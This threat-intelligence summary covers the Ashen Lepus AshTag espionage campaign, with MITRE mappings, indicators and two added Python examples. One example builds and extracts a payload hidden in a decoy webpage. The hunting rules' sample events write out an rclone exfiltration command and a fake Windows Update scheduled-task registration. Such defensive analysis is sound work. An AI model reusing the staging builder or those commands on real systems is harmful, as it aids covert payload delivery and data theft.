Ashen Lepus conducted a long-running espionage campaign against Middle Eastern government and diplomatic targets, evolving its tooling and OpSec to deliver a new modular .NET malware suite named AshTag that relies on DLL side-loading, in-memory execution, and encrypted payloads embedded in benign-looking webpages. The group moved its C2 infrastructure to legitimate-looking subdomains, carried out hands-on data theft (including exfiltration with Rclone), and persisted via scheduled tasks, continuing to operate throughout the Israel-Hamas conflict. #AshenLepus #AshTag
Keypoints
- Ashen Lepus (aka WIRTE) deployed a new modular .NET malware suite called AshTag, replacing prior test-phase tooling with a fully featured backdoor capable of file exfiltration, command execution and in-memory module execution.
- The infection chain begins with a decoy PDF that directs the target to a file-sharing service hosting a RAR archive; the executable inside, once run by the user, side-loads the first malicious loader (netutils.dll), which opens a decoy PDF and retrieves staged payloads from C2 webpages.
- Loaders and stages hide payloads inside ordinary HTML elements of the staging page: they locate the module by searching for an HTML comment that names the carrying tag, then Base64-decode and XOR- or AES-decrypt the extracted content.
- Operators improved OpSec by registering API- and authentication-style subdomains under legitimate-looking domains (technology and medical themes) and geofencing the servers, so automated analysis from outside the target region is turned away and malicious requests blend with ordinary web traffic.
- AshenStager injects the decoded payload into memory and establishes persistence through a scheduled task whose action is launched by the Task Scheduler service host (svchost.exe); some injection features in the current samples are still under development.
- After the automated stages completed, operators worked hands-on: staging diplomacy-related documents in C:\Users\Public, harvesting emails, and exfiltrating the data to attacker-controlled servers with the legitimate Rclone tool.
- Unit 42 mapped infrastructure, file names and encryption artifacts to prior Ashen Lepus activity and provided telemetry-based protections via WildFire, URL/DNS filtering, Cortex XDR and XSIAM.
MITRE Techniques
- [T1204.002] User Execution: Malicious File – Initial compromise relies on the target running the binary from the lure archive: “A targeted victim clicks the binary file, expecting to open a document.”
- [T1574.001] Hijack Execution Flow: DLL Side-Loading – The first loader is a DLL side-loaded by a user-launched executable: “the binary side-loads the first malicious loader (netutils.dll)”.
- [T1053.005] Scheduled Task/Job: Scheduled Task – Persistence is established via a scheduled task: “AshenStager also sets its persistence via a scheduled task, executed by svchost.exe.”
- [T1055] Process Injection – Decoded payloads are injected and run in memory rather than written to disk: “After extracting the payload, AshenStager decodes, parses and injects the payload in memory.”
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communication uses HTTP(S) requests to pages on the attacker-registered subdomains: “AshenStager is designed to send an HTTP request to its C2 server.”
- [T1140] Deobfuscate/Decode Files or Information – Stages Base64-decode and then XOR- or AES-decrypt payloads carried in HTML and JSON: “the stager receives a Base64-encoded JSON file” and payloads are decrypted with the hardcoded AES/XOR keys listed under Indicators of Compromise.
- [T1566.001] Phishing: Spearphishing Attachment – The lure is a decoy PDF that leads to a malicious archive: “benign PDF decoy file that guides targets to a file-sharing service to download a RAR archive containing a malicious payload.”
- [T1497.001] Virtualization/Sandbox Evasion: System Checks – The checks run on the server side: the C2 gates payload delivery on the requester’s geolocation and on User-Agent strings specific to the malware: “the server checks the victim’s geolocation, and checks specific User-Agent strings in the traffic that are unique to the malware.” Because the gating is server-side, a sample detonated outside the targeted geography, or replayed without the malware’s User-Agent, is unlikely to receive the next stage and may look benign.
- [T1041] Exfiltration Over C2 Channel – Staged documents were pushed to attacker infrastructure with a legitimate sync tool: “To exfiltrate the staged files, Ashen Lepus downloaded the Rclone open-source tool, transferring the data to an attacker-controlled server.”
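The staging scheme described in the Keypoints (a payload hidden in an HTML element, located through a commented tag name, then Base64-decoded and XOR/AES-decrypted) and in the T1140 entry above, reconstructed as a runnable Python example. This is an added illustration, not Unit 42's or AshTag's code: the comment syntax, the carrier tag name "article", the XOR key and the sample page are all assumptions chosen to show the pattern, and the only sanity check applied to the decrypted output is the "MZ" header a .NET module would carry.

```python
"""Payload hidden in a benign-looking webpage: build one, then extract it.

Added example, not Unit 42's or Ashen Lepus's code. The summary says the loaders
look for a commented tag name, pull Base64 text out of the HTML element with
that name and then decrypt it (XOR or AES). The real comment syntax, tag names
and keys are not given here, so the comment format, the carrier tag "article",
the XOR key and the sample page below are assumptions, not indicators.
"""
from __future__ import annotations

import base64
import re
from html.parser import HTMLParser

XOR_KEY = b"example-key"        # assumed key for the demo, not a real AshTag key
CARRIER_TAG = "article"         # assumed carrier element
# Constructed stand-in for a .NET module: a PE image starts with the 'MZ' magic.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"constructed fake .NET module body"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_staging_page(payload: bytes, tag: str, key: bytes) -> str:
    """Server side: XOR, Base64 and drop the blob into <tag>...</tag>, with an
    HTML comment naming the tag so the loader knows where to look. The rest of
    the page is filler that looks like a health/technology site."""
    blob = base64.b64encode(xor_bytes(payload, key)).decode()
    return (
        "<html><head><title>Healthy Life Feed</title></head><body>\n"
        "<!-- Copyright 2025 -->\n"               # a comment that is not a tag name
        "<p>Welcome to our wellness community.</p>\n"
        f"<!-- {tag} -->\n"                        # the marker the loader searches for
        f'<{tag} class="hidden">{blob}</{tag}>\n'
        "<p>More articles soon.</p>\n"
        "</body></html>"
    )


class _PageScanner(HTMLParser):
    """Collect every HTML comment and the text inside every <wanted> element."""

    def __init__(self, wanted: str | None = None):
        super().__init__()
        self.wanted = wanted
        self.comments: list[str] = []
        self.texts: list[str] = []
        self._depth = 0

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_starttag(self, tag, attrs):
        if tag == self.wanted:
            self._depth += 1
            self.texts.append("")

    def handle_endtag(self, tag):
        if tag == self.wanted and self._depth:
            self._depth -= 1

    def handle_data(self, data):
        if self._depth:
            self.texts[-1] += data


def extract_payload(html: str, key: bytes) -> bytes | None:
    """Loader side: for every comment that is a bare tag name, take the text of
    the matching elements, Base64-decode, XOR-decrypt and keep the first result
    that looks like a PE/.NET image. Returns None when nothing qualifies, which
    is also what the benign page served outside the geofence would produce."""
    scanner = _PageScanner()
    scanner.feed(html)
    for comment in scanner.comments:
        if not re.fullmatch(r"[A-Za-z][A-Za-z0-9-]*", comment):
            continue                                 # prose comments are not markers
        collector = _PageScanner(wanted=comment.lower())  # HTMLParser lowercases tags
        collector.feed(html)
        for text in collector.texts:
            try:
                raw = base64.b64decode("".join(text.split()), validate=True)
            except ValueError:                       # binascii.Error is a ValueError
                continue
            candidate = xor_bytes(raw, key)
            if candidate.startswith(b"MZ"):
                return candidate
    return None


SAMPLE_PAGE = build_staging_page(SAMPLE_PAYLOAD, CARRIER_TAG, XOR_KEY)

if __name__ == "__main__":
    print("recovered module:", extract_payload(SAMPLE_PAGE, XOR_KEY) == SAMPLE_PAYLOAD)
    print("wrong key yields:", extract_payload(SAMPLE_PAGE, b"wrong"))
```

The loader side is the part worth reusing when triaging a suspected staging page: enumerate comments that are bare tag names, pull the text of the matching element, and try the recovered keys. A page fetched from outside the geofence, or with a standard browser User-Agent, will simply yield no candidate, so a null result says nothing about the server.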
Indicators of Compromise
- [SHA256 Hashes] Malware sample hashes (loaders, stagers and modules) – 3502c9e4…768, f554c437…31bc, and 17 further hashes; the full list is in the Unit 42 report linked below.
- [Domains] C2, backdoor and exfiltration domains – api.healthylifefeed[.]com, forum.techtg[.]com, and 10 other domains (e.g., api.softmatictech[.]com, api.technology-system[.]com); note the API- and forum-style host names under technology- and health-themed parent domains.
- [File names] Loader and decoy file names used in the chain – Document.pdf (decoy), netutils.dll (first loader), wtsapi32.dll (also seen as dwampi.dll) used for side-loading.
- [Scheduled Tasks] Persistence tasks created on the host – C:\Windows\System32\Tasks\Windows\WindowsDefenderUpdate\Windows Defender Updater; C:\Windows\System32\Tasks\Automatic Windows Update. Both names imitate Windows maintenance tasks; genuine Microsoft tasks live under \Microsoft\Windows\.
- [Encryption Keys / Nonce] Hardcoded AES keys and nonces found in the binaries – Key: {9a 20 51 98 … ea 8b}, Nonce: {44 ba 8c … ea 8b}; variant 2 also carries a generic default key/nonce pair.
- [Tools] Legitimate utilities abused – Rclone (transfer of the staged files to an attacker-controlled server) and svchost.exe (the Task Scheduler service host that launches the persistence task’s action).
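Hunting logic for the persistence and exfiltration behaviour summarised in the Keypoints, the T1053.005 and T1041 entries, and the scheduled-task indicators above, as an added Python example that is not Unit 42's or Ashen Lepus's code. It runs three rules over constructed process-creation events shaped like Sysmon/EDR process-start records (image, command line, parent image, parent command line): a child of the Task Scheduler's svchost.exe launched from a user-writable directory, an Rclone transfer to a remote, and a schtasks /create that registers a Windows-Update- or Defender-sounding task whose action sits in a user-writable path. The event field names, sample paths, the remote name "exfil:" and the "-s Schedule" parent command line are assumptions about the telemetry, not indicators from the report.

```python
"""Hunting rules for scheduled-task persistence and Rclone exfiltration.

Added example, not Unit 42's or Ashen Lepus's code. The events below are
constructed to resemble Sysmon/EDR process-creation records; field names,
paths, the remote name "exfil:" and the "-s Schedule" parent command line are
assumptions about the telemetry, not indicators from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\",
                          "c:\\windows\\temp\\", "c:\\temp\\")
RCLONE_TRANSFER_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
MIMIC_TASK_WORDS = ("windows defender", "windows update")
# An rclone remote is "name:" with a multi-character name not followed by a path
# separator, which rules out drive letters (C:\...) and URLs (https://...).
REMOTE_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]+:(?![\\/])")


@dataclass
class ProcessEvent:
    image: str
    cmdline: str
    parent_image: str = ""
    parent_cmdline: str = ""


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def in_user_writable(path: str) -> bool:
    return path.strip('"').lower().startswith(USER_WRITABLE_PREFIXES)


def is_scheduler_child_from_user_path(ev: ProcessEvent) -> bool:
    """Task Scheduler runs as `svchost.exe -k netsvcs -p -s Schedule`; a child it
    starts from a user-writable directory is a persistence lead (T1053.005)."""
    parent_is_scheduler = (
        ev.parent_image.lower().endswith("\\svchost.exe")
        and re.search(r"-s\s+Schedule\b", ev.parent_cmdline, re.IGNORECASE)
    )
    return bool(parent_is_scheduler and in_user_writable(ev.image))


def is_rclone_remote_transfer(ev: ProcessEvent) -> bool:
    """rclone <copy|sync|move> with a remote: destination. `rclone version` or a
    local-to-local copy does not fire; a renamed binary would need a hash rule."""
    toks = tokens(ev.cmdline)
    if not toks:
        return False
    looks_like_rclone = (re.search(r"(^|\\)rclone(\.exe)?$", toks[0], re.IGNORECASE)
                         or ev.image.lower().endswith("\\rclone.exe"))
    if not looks_like_rclone:
        return False
    if not any(t.lower() in RCLONE_TRANSFER_VERBS for t in toks[1:]):
        return False
    return any(REMOTE_RE.match(t) for t in toks[1:])


def is_mimic_task_registration(ev: ProcessEvent) -> bool:
    """schtasks /create whose task name imitates Windows Update or Defender while
    the action (/tr) lives in a user-writable directory."""
    toks = tokens(ev.cmdline)
    if not toks or not re.search(r"(^|\\)schtasks(\.exe)?$", toks[0], re.IGNORECASE):
        return False
    lowered = [t.lower() for t in toks]
    if "/create" not in lowered:
        return False
    name = action = ""
    for i, t in enumerate(lowered):
        if t == "/tn" and i + 1 < len(toks):
            name = lowered[i + 1]
        elif t == "/tr" and i + 1 < len(toks):
            action = toks[i + 1]
    return any(w in name for w in MIMIC_TASK_WORDS) and in_user_writable(action)


RULES = {
    "T1053.005 scheduler child from user-writable path": is_scheduler_child_from_user_path,
    "T1053.005 schtasks registering Windows-lookalike task": is_mimic_task_registration,
    "exfiltration: rclone transfer to remote": is_rclone_remote_transfer,
}


def triage(events: list[ProcessEvent]) -> list[tuple[str, str]]:
    """Return (rule name, image) for every event that fires a rule."""
    return [(name, ev.image) for ev in events for name, rule in RULES.items() if rule(ev)]


SCHED = "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s Schedule"
SVCHOST = "C:\\Windows\\System32\\svchost.exe"
SAMPLE_EVENTS = [  # constructed events, not telemetry from the report
    # benign: a Microsoft component started by the scheduler
    ProcessEvent("C:\\Windows\\System32\\MusNotification.exe", "MusNotification.exe Display", SVCHOST, SCHED),
    # suspicious: scheduler child running from C:\Users\Public
    ProcessEvent("C:\\Users\\Public\\Libraries\\updater.exe", '"C:\\Users\\Public\\Libraries\\updater.exe"', SVCHOST, SCHED),
    # not flagged: rclone present but no transfer to a remote
    ProcessEvent("C:\\Users\\Public\\rclone.exe", "rclone.exe version"),
    # suspicious: staged documents pushed to an attacker remote
    ProcessEvent("C:\\Users\\Public\\rclone.exe",
                 "C:\\Users\\Public\\rclone.exe copy C:\\Users\\Public\\staging exfil:inbox --transfers 4"),
    # suspicious: lookalike task name from the IoC list, action in a user-writable path
    ProcessEvent("C:\\Windows\\System32\\schtasks.exe",
                 'schtasks.exe /create /tn "Automatic Windows Update" /tr "C:\\Users\\Public\\Libraries\\updater.exe" /sc minute /mo 30',
                 "C:\\Windows\\System32\\cmd.exe"),
]

if __name__ == "__main__":
    for rule_name, image in triage(SAMPLE_EVENTS):
        print(f"{rule_name}: {image}")
```

On Windows 10 and later with service-host splitting, the Task Scheduler runs in its own `svchost.exe -s Schedule`, which is what the first rule keys on; on hosts that share one netsvcs process the parent command line lacks that switch and the rule should fall back to parent svchost.exe plus a user-writable child image. Treat hits as leads rather than convictions: per-user installers and legitimate Rclone backups also run from C:\Users.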
Read more: https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/